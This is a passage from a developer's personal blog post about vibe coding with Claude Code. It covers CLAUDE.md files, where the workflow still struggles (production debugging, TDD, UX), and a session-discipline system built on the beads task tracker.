CLAUDE.md files are more powerful than you think. I have a global one in ~/.claude/CLAUDE.md with rules that apply everywhere. Each project gets its own with project-specific instructions. Claude reads these automatically. They’re like a pre-prompt you never have to retype. They do count against your context window, so keep them short.

What Still Doesn’t Work

Now, here’s the part where I’m supposed to tell you it’s all solved and my workflow is perfect.

It’s not.

Debugging production issues is still clunky. I’ve got a combination of skills and MCPs that sort of works, but there’s too much manual context assembly. Something breaks in prod and I’m still spending the first 20 minutes of the session explaining the architecture before we can even start diagnosing.

Test-driven development doesn’t flow. The loop of “write test, see it fail, implement, see it pass” — it’s awkward. Claude wants to write everything at once. I’m still tweaking my tooling to make TDD feel natural.

UX work is hard. Like, fundamentally hard. Claude can scaffold UI. It can generate components. But “does this feel right?” is a human judgment call, and trying to get there through text-based iteration is like describing a painting to someone and asking them to tell you if it’s beautiful.

These are the walls I’m hitting. I’m building tooling to address them — an agent orchestrator that tailors Claude to my specific workflow. Work in progress. If you’re the adventurous type, you can try it now.

The System

So here’s the actual system, if you want to try it:

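Install beads: npm install -g @beads/bd, then run bd init inside your project’s git repository. (Beads is Steve Yegge’s project, not an Anthropic package; check its README for current install options.)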
Add to your global CLAUDE.md: “Check bd ready at session start. One bead per session.”
Separate grooming from coding. Different sessions. Different mindsets.
Resist the urge to “do more while there’s context left.” That’s the trap.
Protect your context. Project-level MCPs only. Kill anything you don’t need.

Two SaaS products since mid-2025. All vibe coded with this system.

Not because the tools are magic. The tools are good, but tools are never magic. What made it work was the discipline — the willingness to be a little bit boring about context hygiene, to resist the temptation to do more, to trust that a focused session ships more than a scattered one.

Vibe coding without chaos. It turns out it’s not about vibing harder. It’s about vibing deliberately.

You’re the head chef now. But don’t forget your mise en place.

My wife was right, by the way. She usually is.

I’m Lakshmi. 20 years in software — ops, infrastructure, full-stack. Now solo founder using Claude Code to develop, deploy, and distribute.